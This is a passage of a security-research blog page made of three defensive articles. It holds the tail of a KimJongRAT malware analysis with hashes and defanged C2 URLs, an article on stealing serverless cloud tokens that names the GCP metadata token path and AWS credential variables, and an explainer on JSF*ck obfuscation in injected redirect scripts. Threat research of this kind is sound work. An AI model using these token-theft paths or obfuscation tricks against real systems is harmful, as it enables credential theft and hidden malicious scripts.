The only files that differ are 1.log, which contains Base64-encoded text for the PowerShell stealer, and 2.log, which contains Base64-encoded text for the keylogger module. The PowerShell stealer is an older version that uses the system’s BIOS serial number instead of the UUID, among other minor differences. The keylogger module is also an older version that uses the BIOS serial number.

Conclusion

Since it first emerged in 2019, the KimJongRAT stealer has evolved, adapting to the changing cybersecurity landscape. Our previous article highlighted the older variants of this malicious tool, and this article delves deeper into its latest incarnations. One variant uses a PE file, and another is a PowerShell implementation. This adaptability not only showcases the persistent threat posed by such malware but also underscores its developers' commitment to updating and expanding its capabilities.

This new analysis reveals the PowerShell variant's special focus on cryptocurrency, as it searches for an extensive list of browser wallet extensions.

The continued development and deployment of KimJongRAT, featuring changing techniques such as using a legitimate CDN server to disguise its distribution, demonstrates a clear and ongoing threat. Our comprehensive examination of these new variants provides crucial insights into their operation, aiding in the ongoing efforts to detect, neutralize and mitigate their effects.

Palo Alto Networks customers are better protected from the threats described in this article in the following ways:

  • The Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated in light of the IoCs shared in this research
  • Advanced URL Filtering and Advanced DNS Security identify known URLs and domains associated with this activity as malicious
  • Advanced Threat Prevention has an inbuilt machine learning-based detection that can detect exploits in real time.
  • Cortex XDR and XSIAM are designed to prevent the execution of known malicious malware, and also prevent the execution of unknown malware using Behavioral Threat Protection and machine learning based on the Local Analysis module.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
  • UK: +44.20.3743.3660
  • Europe and Middle East: +31.20.299.3130
  • Asia: +65.6983.8730
  • Japan: +81.50.1790.0200
  • Australia: +61.2.4062.7950
  • India: 00080005045107

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

SHA256 Hashes of Initial LNK Files

  • a66c25b1f0dea6e06a4c9f8c5f6ebba0f6c21bd3b9cc326a56702db30418f189
  • 28f2fcece68822c38e72310c911ef007f8bd8fd711f2080844f666b7f371e9e1
  • 3b0a3bd5b790e5f130e7819550613b7e0194a3475f553285a1b7dc18ecca9d02
  • 8a000aa43c17250dd02f842bc2ab37e47dd8d68da0d59753943df8b37004b701
  • b90b2d992b41d146e70b775e2bc0430b9f7fb0ed0cd285c59daea92c2fc6af0b
  • d92b858d691c84b4e3752fdd46b5673fbd6b5af101a7111c1d8756c90271b732
  • be080777332ad1186fb8547a6a354b2beba62f2a24537eb7b79e849f084a95be

SHA256 Hashes of First Stage HTA Files

  • 02783530bbd8416ebc82ab1eb5bbe81d5d87731d24c6ff6a8e12139a5fe33cee
  • 3c2ea04090ad8c28116c42a9a2be5b240f135ac184e5a2c121b4eb311a7bf075
  • 9c9136fc8a279ce395997dd42c075e265c6daec14b13bbe4237a4178769d270e
  • 9bfbf7618a2c5270d552f4deb69b56082cc7723433a1517678863363cb800161
  • 6347d70b73e1cabadf8af8602b22a8220ed5b7298dbc15f16eb7dd493d6c6a78
  • b7dad38a099947612fcc42c50f4ba1708af969a3222b3345bdff35323a41974d
  • bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234
  • 45980cc8afb4e1b3738130d0855bb608530eef6731c5116fd053ac6e04159725
  • 7a37e2d6dc941386d1f300bac48056030f37c950bcd441d83eca708d2beab939

SHA256 Hashes of Second Stage Loader Files (baby.dll)

  • f4d9547269e0cd7a0df97e394f688e0eb00b31965abd5e6ad67d373a7dc58f3b
  • 7a9f4ca13aed4d6d8ba430bc2b2f5ac2e4f9c7b5de2f5d2ba5aada211059da73
  • d7a61ab1b1eadd3b34386ec2a96324195ec25cd71fe4e5d9a8f993a6bd52eb92
  • 945e4f78196ef3a5548996a8d09e4220b779a2e78d40a86d64f233f7908550e6
  • 5a18a29791cfb18767a43bebb61f923e64be7988235213678514007174f60b3e
  • 4b87b775cdb265ecd872a71be810d7816d0d8b54663b3c536862db098874f288
  • 8b0b62a31b348c5a2337ee69cfd3f68a427466539484f55f1cd2910237b59700
  • 9e4e45e8f12db94997767bd3899968b9bc147bf08c062d3caea7f0864a67ea2c

SHA256 Hashes of KimJongRAT Orchestrator Files (NetworkService.dll)

  • 85be5cc01f0e0127a26dceba76571a94335d00d490e5391ccef72e115c3301b3
  • bdb272189a7cdcf166fce130d58b794b242c582032f19369166b3d4cfdc0902c
  • 2ba3397cba28af1a929403910035b78bf946acbafe9e186ac329b55086fe7703
  • accf50d769408253bf9a7da378228debce7c8f6d60fb76da48196fe42cacedf3

SHA256 Hashes of KimJongRAT Stealer Files (dwm.dll, UPX packed)

  • 96df4f9cb5d9cacd6e3b947c61af9b8317194b1285936ce103f155e082290381
  • c356cd9fea07353a0ee4dfd4652bf79111b70790e7ed63df6b31d7ec2f5953d5
  • 5097553dff2a2da4f16b80a346fe543422b22d262e0c40e187b345afbcc7d41a
  • ef0ce406fa722d30bfa094c660e81ed4a72ff8c75a629081293f4a86e0e587c2

SHA256 Hash of PowerShell Loader File

  • 97d1bd607b4dc00c356dd873cd4ac309e98f2bb17ae9a6791fc0a88bc056195a

SHA256 Hashes of PowerShell Stealer Files

  • b103190c647ddd7d16766ee5af19e265f0e15d57e91a07b2a866f5b18178581c
  • eb68ed54e543c18070e5cc93a27db4a508d79016c09e28a47260ca080110328f

SHA256 Hashes of PowerShell Keylogger Files

  • 3c6476411d214d40d0cc43241f63e933f5a77991939de158df40d84d04b7aa78
  • 4e45009f5b582ca404b197d28805e363a537856b55e39c5c806fcf05acd928ff

SHA256 Hash of Persistence VBS File

  • f73164bd4d2a475f79fb7d0806cfc3ddb510015f9161e7dce537d90956c11393

CDN Stager (Base) URLs

  • cdn.glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/
  • cdn.glitch[.]global/17443dac-272c-421c-80ac-53a3695ede0e/
  • cdn.glitch[.]global/c97fe797-45c1-473b-a2f8-3c0c8bb431af/
  • cdn.glitch[.]global/59e3786e-8284-4f16-8844-134b12e58b6f/
  • cdn.glitch[.]global/4ab4f138-6f66-4b39-a7dc-9d4843dcf34f/

C2 (Base) URLs

  • 131.153.13[.]235/sp/
  • 131.153.13[.]235/service/
  • secservice.ddns[.]net/service2/
  • srvdown.ddns[.]net/service3/

Additional Resources

 

Serverless Tokens in the Cloud: Exploitation and Detections

Posted on by Samantha Stallings

Executive Summary

This article outlines the mechanics and security implications of serverless authentication across major cloud platforms. Attackers target serverless functions in the hope of exploiting vulnerabilities that arise as a result of application developers deploying insecure code and misconfiguring cloud functions. Successful exploits of these weaknesses enable attackers to obtain credentials that can then be abused.

Serverless computing functions are often associated with cloud identities that use authentication tokens to gain temporary, scoped access to cloud services and resources. Exfiltrating these tokens can expose cloud environments to security risks.

Amazon Web Services (AWS) Lambda, Azure Functions and Google Cloud Run Functions are all examples of serverless platforms and functions that make use of credentials. These credentials include identity and access management (IAM) roles in AWS, managed identities in Azure and service account tokens in the Google Cloud Platform (GCP).

Understanding how these services operate enables us to implement effective strategies to avoid exposing tokens and to detect the abuse of exposed tokens that can lead to the compromise of cloud environments. Such compromises involve privilege escalation, malicious persistence within the environment and the exfiltration of sensitive information that only legitimate identities should be able to access.

Palo Alto Networks customers are better protected through our Cortex line of products from threats discussed in this article.

Cortex Cloud provides contextual detection of the malicious operations detailed within this article using attack path, or attack flow, scenario detections. This provides flexibility in defining and enforcing security policies or exceptions when faced with evolving or complex attack techniques.

Related Unit 42 Topics Amazon Web Services, Microsoft Azure, Google Cloud

Introduction

Serverless computing is a cloud model where providers like AWS (Lambda), Azure (Functions) and Google Cloud (Functions) manage infrastructure, scaling and maintenance. This model enables organizations and their developers to focus solely on code, while the cloud provider handles backend tasks.

Operating on an event-driven basis, serverless functions execute in response to triggers like HTTP requests, database changes or scheduled events. The function service’s automated scaling adjusts resources to match demand, ensuring cost efficiency by the cloud provider only charging for execution time and resources used.

While serverless computing simplifies development and deployment, it is important to understand the potential risks associated with these services. Some of those risks arise from the fact that developers can assign identities to serverless functions, and those identities are manifested as credential sets that are accessible to the code executing within the function. These credentials are used for authentication and authorization to perform cloud operations.

These credentials are applied with a set of permissions that dictate their use. Depending on the permissions associated with the identity attached to the function, those credentials can enable access to cloud resources and sensitive data.

Attackers target serverless functions for these reasons:

  • Serverless functions can often be vulnerable to remote code execution (RCE) or server-side request forgery (SSRF) attacks due to insecure development practices
  • Serverless functions are often publicly exposed (either by design or due to misconfiguration) or process inputs from external sources
  • Attackers can exploit serverless tokens to obtain unauthorized read/write access that could potentially jeopardize critical infrastructure and data

When using serverless functions, it is important to consider the risks involved when application developers deploy insecure code to cloud functions, and to understand the threats that target these functions.

How Serverless Authentication Works in Major Cloud Platforms

Using the serverless approach, applications are deployed by executing functions on demand. The primary advantage of this approach is that applications or specific components can be run on an as-needed basis, eliminating the need for a continuously running execution environment.

Each of the major cloud providers shares similar concepts for serverless functions, such as:

  • Support for multiple code languages
  • The absence of SSH access due to their fully managed architecture
  • Using roles, service accounts or managed identities to securely manage resource access

AWS Lambda

The IAM service in AWS enables the creation and management of users, permissions, groups and roles. The service is responsible for managing identities and their level of access to AWS accounts and services, and control of various features within an AWS account.

Serverless functions use Lambda roles, which do not have default permissions; IAM policies must be used to manage permissions and secure access to other AWS services.

To make permission management simpler, AWS provides managed policies (like AWSLambdaBasicExecutionRole) that developers often attach to these roles to quickly enable basic functionality.

When an IAM role is associated with a Lambda function, the AWS Security Token Service (STS) automatically generates temporary security credentials for that role.

This is a secure way to get access to credentials at runtime without the risks associated with long-term, hard-coded credentials.

These credentials are scoped to the permissions defined in the role's associated access policy. They include an access key ID, secret access key and session token.

At runtime, the Lambda runtime service loads the role credentials into the function’s execution environment and stores them as environment variables, such as AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN. These variables are accessible to the code of the function during runtime, allowing the function to interact securely with other AWS services.

Google Cloud Functions

Google Cloud Functions use service account tokens to authenticate and authorize access to other Google Cloud services. A service account is a specialized Google account that is tied to a project and represents a non-human identity, rather than to an individual user.

When deploying a Cloud Function, developers can attach the function to a custom service account or the default service account. When using a custom service account, developers can assign specific IAM roles to define the exact permissions the function requires to perform its tasks.

Default service accounts are user-managed accounts that Google Cloud automatically creates when users enable specific services. By default, Google Cloud Functions use different service accounts depending on the generation:

  • First-generation Cloud Run functions use the App Engine default service account (<project_id>@appspot.gserviceaccount.com)
  • Second-generation Cloud Run functions use the Default Compute service account (<project_number>-compute@developer.gserviceaccount.com)

These default service accounts are granted editor permissions when developers are onboarding to GCP without an organization, allowing them to create, modify and delete resources within the project. However, in projects under a GCP organization, default service accounts are created without any permissions. In such cases, they can only perform actions that are explicitly allowed by the roles assigned to them.

Although a GCP Function operates in a serverless environment, when it comes to accessing the credentials associated with the function, it behaves similarly to a traditional server, such as a virtual machine (VM) instance, by retrieving its service account tokens from the Instance Metadata Server (IMDS) at runtime. The IMDS at hxxp://metadata.google[.]internal/ provides short-lived access tokens for the function’s associated service account. These tokens enable the function to authenticate to GCP services.

Azure Functions

Azure managed identities provide a secure and seamless way for Azure resources to authenticate to and interact with other Azure services without the need for hard-coded credentials. In the same way as AWS and GCP's function services, these identities eliminate the risks associated with managing credentials in code.

System-assigned managed identities are tied to a single resource and automatically deleted when the resource is removed. On the other hand, user-assigned managed identities are independent resources that can be assigned to multiple services, offering more flexibility for shared authentication scenarios.

An Azure Function with a managed identity attached to it should use its managed identity token to authenticate to an Azure resource. The step-by-step authentication process is as follows:

  • The function queries its environment variables to retrieve the values of IDENTITY_ENDPOINT and IDENTITY_HEADER.
    • IDENTITY_ENDPOINT: An environment variable that contains the address of the local managed identity endpoint provided by Azure. This is a local URL from which an app can request tokens.
    • IDENTITY_HEADER: A required parameter when querying the local managed identity endpoint. This header is used to help mitigate SSRF attacks.
  • The function sends an HTTP GET request to the local managed identity endpoint with the IDENTITY_HEADER included as an HTTP header. (For details on the request structure, refer to Azure’s documentation on acquiring tokens for App Services)
  • Microsoft Entra ID (formerly Azure Active Directory) verifies the function's identity and issues a temporary OAuth 2.0 token that is scoped specifically for the target resource.
  • The function includes the issued token in its request to the Azure resource (e.g., Azure Key Vault, Storage Account).
  • The Azure resource validates the token and checks the function’s permissions using role-based access control, or resource-specific access policies.

If authorized, the resource grants access to perform the requested operation. This ensures secure and seamless authentication without the need to use hard-coded secrets in the code.

Token Exfiltration Attack Vectors

This section discusses the risks and threats involved in the use of serverless functions. When developing and configuring functions, application developers should be sure to secure those functions against attacks like SSRF and RCE. In the absence of such security, attackers could manipulate serverless functions that are vulnerable to SSRF, causing the functions to send unauthorized requests to internal services. This can lead to unintended access or exposure of sensitive information within the system, such as access tokens, internal database content or service configurations. It is important to emphasise that these risks primarily arise when functions are public, or process inputs from external users and other sources.

In SSRF attacks, an attacker tricks a server (like a serverless function) into making HTTP requests to internal or external resources that the attacker shouldn't have access to. Since the server itself makes the request, it can access internal services that are not exposed to the internet. A vulnerable serverless function takes a URL as input and fetches data from it.

In GCP, SSRF can be used to access the IMDS at hxxp://metadata.google[.]internal/, extracting short-lived service account tokens. An attacker can then leverage these tokens to impersonate the function and perform unauthorized actions within its IAM role's permissions. Remote code execution vulnerabilities allow attackers to execute arbitrary code within a function’s environment.

For AWS Lambda, RCE attacks could expose temporary credentials stored in environment variables, such as AWS_ACCESS_KEY_ID and AWS_SESSION_TOKEN.

It is essential to note that these attack vectors are not inherent flaws in the cloud platforms themselves, but rather arise from insecure code written by application developers that could introduce vulnerabilities, such as SSRF or RCE. Application developers can mitigate these risks by implementing secure coding practices such as input validation.

Attack Vector Simulations

The following simulations demonstrate possible ways attackers could extract serverless tokens and use them for malicious activities in different cloud service providers (CSPs). These attacks could leverage unsecure function code that was deployed by application developers.

Simulation 1: Gaining Direct Access to IMDS from GCP Function

To conduct this simulation, we deployed two Google Cloud Run functions that access the function metadata service and extract the tokens of the two different attached service accounts from the following path:

  • hxxp[://]metadata.google[.]internal/computeMetadata/v1/instance/service-accounts/default/token

The first example demonstrates the extraction of a default service account. The second example demonstrates the extraction of a custom service account. These examples show how code can directly access the metadata service, just as a vulnerable SSRF code application could access it as well.

Example 1: Extracting a GCP Default Service Account

As shown in Figure 1, the service account attached to the function was the default serverless service account. Figure 2 demonstrates that the returned access token belongs to the same service account.

Screen capture of a General Information section displaying deployment specifications including deployment date, region as US-central1, memory allocated at 256 MiB, CPU usage, timeout period, minimum and maximum instances, concurrency, and a service account email address with some information redacted.
Figure 1. General information about the function, including an attached service account name (the default service account).
Screenshot of a command line interface executing a cURL command to a Google Cloud function, including partial visibility of an access token and a service account email address. Many lines are redacted.
Figure 2. Code snippet of a command used to extract the service account access token, including the output.
Example 2: Extracting a GCP Custom Service Account

Figure 3 shows the custom service account that we attached to the function. Figure 4 shows the returned access token belonging to the custom service account. We then used the returned token to perform operations in the environment.

Screenshot showing general information of a deployment in Google Cloud Platform, including last deployment date, region, memory, CPU allocation, and other service details. Some of the email address is redacted.
Figure 3. General information about the function, including the attached service account name (a custom service account).
Screenshot of a command line interface using cURL to make an API request to IBM's cloud functions, including partial visibility of an authorization token and a service account email. Many lines are redacted.
Figure 4. Code snippet of a command used to extract the service account access token, including the output.

Figure 5 below shows an example of a command to list buckets.

Screenshot of code input for accessing a Google Cloud Storage API using a curl command with authorization token.
Figure 5. Using the returned token to list buckets in a service account.

If attackers can list and read bucket contents in GCP, they can access sensitive files like credentials, backups or internal configurations. This allows them to steal data, compromise the system or move laterally within the environment.

Once attackers obtain an access token for a service account with Editor permissions in GCP (such as the default Compute Engine service account), they can modify, delete or create resources across most services. This includes accessing sensitive data, deploying malicious workloads, escalating privileges or disrupting services. Editor access effectively grants near-full control over the project.

Simulation 2: Using RCE to Retrieve Tokens Stored in AWS Lambda Function Environment Variables

In this simulation, we accessed the environment variables of the Lambda function and extracted from it the AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN.

Figure 6 shows the output of the Lambda function code.

Screenshot displaying a code snippet with environment variables, with their values partially redacted.
Figure 6. The values of the returned environment variables.

Figure 7 shows the setup of temporary AWS credentials obtained from the previous step (the Lambda environment variables).

Screen showing a list of timestamps and command lines with partial redactions for security. The background is dark with white text.
Figure 7. Code snippet of commands used to list S3 buckets.

Then we used the following command to list all S3 buckets the authenticated session could access.

Simulation 3: Using RCE to Retrieve Tokens From Local Identity Endpoint of an Azure Function

In this simulation, we accessed the environment variables of the Azure function and extracted the IDENTITY_ENDPOINT and the IDENTITY_HEADER by executing remote commands. Then we extracted the managed identity token from the local identity endpoint, providing these parameters shown below in Figure 8:

  • Resource
  • api-version
  • X-IDENTITY-HEADER
Screenshot of code on a black background. Some of the lines are redacted for security concerns. The visible information includes timestamps and more.
Figure 8. The script output, including the access token.

Detecting and Preventing Token Exfiltration

Detecting Token Exfiltration in Serverless Environments

Effective detection mechanisms are critical for identifying token exfiltration in serverless environments. These mechanisms focus on behavior anomalies to flag unauthorized activities. The following are some of the key detection strategies implemented across major cloud platforms.

Detection consists of two stages:

  • Validating that the identity is attached to a serverless function
  • Identifying anomalous behavior of the serverless identities. Such behavior could include:
    • Source IP addresses that do not suit the context in which the function is executing, such as addresses from Autonomous System Numbers (ASNs) that are not associated with a cloud provider
    • Serverless identities making requests with suspicious user agents

Step 1: Identifying Serverless Identities

To identify service accounts attached to serverless functions in GCP, we analyze the serviceAccountDelegationInfo section in the logs. This information provides crucial insights into the delegation chain of service accounts. Specifically, when a service account is attached to a function, it delegates its authority to a default serverless service account:

  • Google Cloud Run Service Agent (service-<PROJECT_NUMBER>@serverless-robot-prod.iam.gserviceaccount[.]com)
  • gcf-admin-robot.iam.gserviceaccount[.]com (service-PROJECT_NUMBER@gcf-admin-robo.iam.gserviceaccount[.]com)

These service accounts execute tasks on behalf of the function.

For example, in the log entry in Figure 9, we see the custom service account that was attached to a function (sa-test@<project-id>.iam.gserviceaccount[.]com) delegating its authority to the Cloud Run Service Agent.

A screenshot of a code snippet displaying various details, including email addresses and service names for Google APIs.
Figure 9. Log entry showing custom service account.

In Figure 9 above, the principalEmail field under authenticationInfo specifies the service account being used (sa-test[@]xdr-analytics.iam.gserviceaccount[.]com).

The serviceAccountDelegationInfo shows the first-party principal (in this case: service-<PROJECT_NUMBER>@serverless-robot-prod.iam.gserviceaccount[.]com), indicating that the service account is operating within a serverless environment like Cloud Functions or Cloud Run.

An effective approach to discover serverless identities is to profile service accounts that have previously delegated their authority to default serverless service accounts. This ensures that even if non-default service accounts are attached to functions, they are identified.

In AWS, Lambda functions rely on IAM roles for secure access to AWS services. These roles generate temporary credentials. We can identify the Lambda identity by its role name.

In Azure, managed identities attached to Azure Function Apps are used for authentication.

Step 2: Identifying Unusual Behavior for Serverless Identities

In a secure cloud environment, serverless functions are typically intended to perform automated, scoped tasks such as responding to API requests or processing events. These functions are not to be used interactively. However, if attackers gain access to a serverless function’s environment or its identity, they might misuse it to run command-line interface (CLI) commands (e.g., gcloud CLI or curl) to interact with cloud resources directly.

One form of detection is to analyze the user agent of API calls. If the user agent matches known CLI tools (e.g., gcloud CLI) or penetration testing frameworks, it is flagged as suspicious, as CLI should not usually be used by serverless identities. This indicates potential exploitation of the environment or service account tokens.

Of note, this method of identifying remote use of serverless tokens according to the user agent cannot be performed in Azure, because user agent information does not appear in Azure logs.

Another approach for detecting remote use of a serverless identity token is to correlate the location of a token’s use with ASN ranges of known cloud provider IP addresses. If a request originates from an external IP address not associated with the CSP, it triggers an alert, highlighting potential unauthorized token usage outside the cloud environment.

Prevention Strategies

Securing serverless tokens requires a combination of proactive measures, posture management and runtime monitoring security practices to minimize the risk of exploitation. First, implement the principle of least privilege by assigning roles with the minimum required permissions for serverless functions. This reduces the potential impact of token misuse.

Additionally, to protect serverless runtime environments in GCP and Azure, restrict access to IMDS by configuring network-level controls and applying request validation mechanisms. Ensure robust input validation and sanitization to prevent attackers from using exploitation techniques like SSRF to access sensitive metadata, tokens and other cloud resources like APIs and databases.

Conclusion

Serverless computing is the preferred choice for modern application development because it offers significant advantages in scalability, cost-efficiency and simplified infrastructure management.

The credentials that enable these functions to interact with cloud services are a critical security element and a prime target for attackers. Compromising these credentials can lead to severe consequences, including unauthorized access to cloud resources and data exfiltration.

Implementing proactive posture management and runtime monitoring protections is a crucial strategy in protecting cloud environments.

Organizations can better protect their serverless environments by:

  • Understanding the mechanics of serverless credentials and best practices to provision and manage them in AWS, Azure and GCP
  • Recognizing common attack vectors like token exfiltration via IMDS exploitation or environment variable access

Palo Alto Networks Protection and Mitigation

Palo Alto Networks customers are better protected from the threats discussed above through the following product:

Cortex Cloud provides contextual detection of the malicious operations detailed within this article using attack path, or attack flow, scenario detections. This provides flexibility in defining and enforcing security policies or exceptions when faced with evolving or complex attack techniques.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Additional Resources

JSFireTruck: Exploring Malicious JavaScript Using JSF*ck as an Obfuscation Technique

Posted on by Brad Duncan

Executive Summary

We recently discovered a large-scale campaign that has been compromising legitimate websites with injected, obfuscated JavaScript code. Threat actors commonly use this type of campaign to invisibly redirect victims from legitimate websites to malicious pages that serve malware, exploits and spam.

The campaign uses a JavaScript obfuscation technique known as JSF*ck (profanity masked). Due to the profanity in the term, we refer to the method in the remainder of this article by using the nickname JSFireTruck.

Our key findings are:

  • Multiple websites have been identified with injected malicious JavaScript that uses JSFireTruck obfuscation, which is composed primarily of the symbols []+${}
  • The code's obfuscation hides its true purpose, hindering analysis
  • The injected code checks the website referrer, and if the referrer is a search engine, the code redirects victims to malicious URLs
  • Retroactive hunting on VirusTotal and our internal telemetry revealed thousands of related samples, indicating this is a widespread infection campaign affecting many websites
  • Injected JavaScript will redirect users to websites that can lead to malware downloads or other harmful activities, like malvertising and traffic monetization

The campaign's scale and stealth pose a significant threat. The widespread nature of these infections suggests a coordinated effort to compromise legitimate websites as attack vectors for further malicious activities.

Palo Alto Networks customers are better protected from the threats discussed in this article through the following products and services:

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics Malvertising, JavaScript

Background

Attackers compromise legitimate websites, so these sites will silently redirect viewer traffic for various malicious purposes, like malware downloads, traffic monetization or malvertising. Our telemetry recently revealed a large group of websites that were injected with malicious obfuscated JavaScript, as shown below in Figure 1.

The image displays a piece of code with various functions and characters, formatted in colorful text on a dark background.
Figure 1. Example of malicious injected JavaScript found in the HTML pages.

On an initial look, the JavaScript code consists of a few characters like []+${} and some numbers. The code's purpose isn't readily apparent, prompting further investigation. We soon discovered that this code partially implements the JSFireTruck programming technique.

Our telemetry detected 269,552 webpages infected with JavaScript code using JSFireTruck in the three months from March 26, 2025, through April 25, 2025. This data is shown below in Figure 2.

A bar chart displaying daily hit counts from March 27, 2025, to April 25, 2025, with a significant peak in April. The y-axis is labeled 'Count' and the x-axis represents the dates.
Figure 2. Telemetry data shows over 200,000 infected pages.

As indicated in Figure 2, we saw a notable increase in detections for this campaign starting on April 12, 2025. Ultimately, this campaign is widespread and has infected many websites.

Analyzing the JavaScript Obfuscation

The injected JavaScript code with JSFireTruck obfuscation uses a limited set of characters and numbers, as shown in Figure 3.

A matrix of hexadecimal green characters on a black background.
Figure 3. Injected code as found in the HTML page consists of only [, ], (, ), !, + and numbers.

This is unexpected compared to examples of malicious injected JavaScript code we normally find, as there is no single variable or function name that seems to be executed at first glance. But publicly available information indicates that the symbols from this code are ASCII characters used for JSFireTruck.

JSFireTruck is a branch of an earlier JavaScript obfuscation technique originally released in 2009 called JJEncode. This earlier technique was used in previous campaigns to obfuscate JavaScript, like Kahu Security's 2013 analysis of a compromised automobile forum. JJEncode uses the following 18 ASCII characters: []()!+,\"$.:;_{}~=

By August 2012, a user named aemkei created a GitHub repository for JSFireTruck, where they reduced the number of ASCII characters to the following six symbols:

[

]

(

)

!

+

The example from Figure 3 above appears to combine JSFireTruck with other obfuscation techniques.

JavaScript Obfuscation Through Type Coercion

JavaScript has different value types like strings, numbers, booleans, arrays and objects. If we use two mismatched value types together, such as strings and numbers, JavaScript uses type coercion to make the code work. Type coercion results in converting a value from one type to another.

Type coercion has various uses, such as displaying a number in JavaScript code as a string. For example, the toString() method will display a numeric value as an ASCII string.

JSFireTruck relies on type coercion, which automatically converts its limited set of symbols into the various ASCII characters or numeric values used in unobfuscated JavaScript code.

For example, to generate a number value of zero, we can use the following characters:

+[]

If we debug the characters +[] in Chrome or Edge DevTools, we find these characters translate to a value of zero, as shown below in Figure 4.

A screenshot of the Google Chrome DevTools interface, focusing on the Sources panel. The image highlights the right-click menu option "Evaluate selected text in console" with a cursor pointing to it, and shows other development tools and icons. The converted value is in the Console pane.
Figure 4. Using DevTools to convert JavaScript code +[] to its numeric value of zero.

How is this possible? In JavaScript code, [] represents an empty array, and if we prefix it with +, JavaScript will use type coercion to convert the empty array value into a number. Since [] contains no value, using + converts it to a value of zero.

Using this approach, we can generate the number 1 with the following characters:

+!![]

Because the [] array is blank, prefixing it with ! converts it to the boolean value of False. Adding a second ! converts it to a boolean value of True. Prefixing the entire string with + converts it to a numeric value. When converting True to a number, its value is 1.

We can generate other numbers by adding the same +!![] text, which represents an additional value of 1. For example, we can generate the number 2 from:

+!![] + +!![]

We can generate the number 3 from:

+!![] + +!![] + +!![]

Similarly, we can increase the numeric value by adding more +!![] text to the string.

We can also generate characters using this approach. For example, to create the character a, we can use the following code:

(![]+[])[1]

In this example, ![] becomes the boolean value False as mentioned earlier. Adding the symbols for a blank array [] makes the string ![]+[], which represents False + no value. JavaScript uses type coercion to convert ![]+[] to the ASCII string False.

To select the second letter of the word False, we need the first offset (second character) of the string. We do this by enclosing the original symbols in parentheses and using 1 for the offset, so (![]+[])[1] is the code that generates the letter a.

Figure 5 shows Edge DevTools confirming that (![]+[])[1] generates the letter a.

A screenshot of the Google Chrome DevTools interface, focusing on the Sources panel. The image highlights the right-click menu option "Evaluate selected text in console" with a cursor pointing to it, and shows other development tools and icons. The converted value is in the Console pane.
Figure 5. Analysis of JavaScript code in DevTools showing how to generate the character a with this approach.

 

In a similar manner, we can generate the character b using the following string:

({}+[])[2]

In this example, {} represents an empty object. Adding the symbols for a blank array [] makes the string {}+[]. JavaScript's type coercion changes {}+[] to the ASCII string [object Object]. To select the second letter of the word object in the string [object Object], we need the second offset (third character) of that string. We do this by enclosing the original symbols in parentheses and using 2 for the offset, so ({}+[])[2] is the code that generates the letter b.

Figure 6 shows Edge DevTools confirming that ({}+[])[2] generates the letter b.

A screenshot of the Google Chrome DevTools interface, focusing on the Sources panel. The image highlights the right-click menu option "Evaluate selected text in console" with a cursor pointing to it, and shows other development tools and icons. The converted value is in the Console pane.
Figure 6. Analysis of JavaScript code in DevTools showing how to generate the character b with this approach.

By using different combinations of symbols and terms, JavaScript's type coercion can generate various ASCII strings. We can use the offset method to select each letter of the alphabet and different symbols from the resulting strings. Figure 7 shows examples analyzed in DevTools that result in the letters c, d, e and f.

Screenshot of DevTools with the Console tab selected, displaying code outputs in a console with various obfuscation examples in JavaScript.
Figure 7. Examples of this obfuscation approach in DevTools that generate the letters c, d, e and f.

 

From this approach, we can further condense the symbols to the six used by JSFireTruck: [, ], (, ), !, and +. For example, we can generate the letters a and b from the following characters:

a = (![]+[])[+!![]]

b = ({}+[])[+!![] + +!![]]

By using the JSFireTruck obfuscation technique, any JavaScript code can be obfuscated by using just six characters. Furthermore, attackers can combine JSFireTruck with other obfuscation techniques to make malicious JavaScript more difficult for defenders to analyze.

But using these obfuscation techniques has two drawbacks:

  • The obfuscated code usually involves a large amount of text
  • Due to the repeated use of the same characters, the obfuscated code is easy to detect, even if it is not easy to analyze

Example of Malicious Code

We now understand how just six characters can represent any JavaScript code. Malware authors use this technique to make code analysis more difficult.

During our analysis, we found thousands of websites with this type of obfuscated JavaScript injected into their webpages.

Figure 8 below shows an example of the injected script following the String.fromCharCode function.

Image displaying a portion of JavaScript code with a div element and variable declarations, involving string manipulations and array operations.
Figure 8. Example of injected code starting from the String.fromCharCode function.

Of note, the obfuscated script contains an additional String.fromCharCode function, which presents another obfuscation layer.

Decoding the Obfuscated Script

We can decode the obfuscated JavaScript shown in Figure 8 through various publicly available deobfuscators for JSFireTruck. We automated our decoding process using one such tool.

When the script from Figure 8 is decoded, the output appears to be further obfuscated as shown in Figure 9.

Image displaying a line of code with a mix of numbers, Boolean values, and text strings, mostly related to various properties such as IDs, indexes, counts, and sizes.
Figure 9. Decoded JSFireTruck script shows that it's further obfuscated.

The decoded script remains obfuscated, using an array variable $. It then accesses the values at different indexes within this array.

These array variables are present inside the script shown in Figure 10.

Screenshot of injected code with a portion highlighted in yellow.
Figure 10. Injected code showing use of String.fromCharCode function used as an array.

If we decode these character arrays and use them to replace the characters in the previous JavaScript where array $[index] is used, we get the result shown in Figure 11 below.

A screenshot of computer code in an editor, highlighting a script involving conditional checks for referrers from well-known search engines such as Google, Bing, DuckDuckGo, Yahoo, and AOL. The code includes HTML manipulation to insert an iframe. Parts of the code and URLs are intentionally blurred for privacy.
Figure 11. Decoded JavaScript code shows the iframe code that will be injected into the HTML page.

